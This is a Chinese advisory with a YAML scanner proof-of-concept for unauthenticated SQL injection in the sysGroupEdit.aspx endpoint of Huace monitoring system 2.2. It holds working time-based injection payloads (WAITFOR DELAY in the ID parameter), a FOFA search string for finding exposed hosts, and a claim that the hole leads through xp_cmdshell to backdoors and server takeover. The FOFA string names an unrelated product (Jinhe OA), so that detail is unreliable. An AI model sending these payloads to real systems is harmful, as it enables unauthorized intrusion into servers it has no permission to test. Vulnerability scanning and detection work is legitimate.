漏洞描述
华测监测预警系统2.2 sysGroupEdit.aspx接口存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xpcmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
FOFA: app="金和网络-金和OA"
id: huace-sysgoupedit-sqli
info:
name: 华测监测预警系统2.2 sysGroupEdit.aspx SQL注入漏洞
author: AVIC123
severity: high
verified: true
description: |-
华测监测预警系统2.2 sysGroupEdit.aspx接口存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xpcmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
FOFA: app="金和网络-金和OA"
reference:
- https://cn-sec.com/archives/4330220.html
tags: huace,sqli
created: 2025/08/06
rules:
r0:
request:
method: GET
path: /Web/SysManage/sysGroupEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:5'--
expression: response.status == 200 && response.latency <= 7000 && response.latency >= 5000
r1:
request:
method: GET
path: /Web/SysManage/sysGroupEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:10'--
expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
expression: r0() && r1()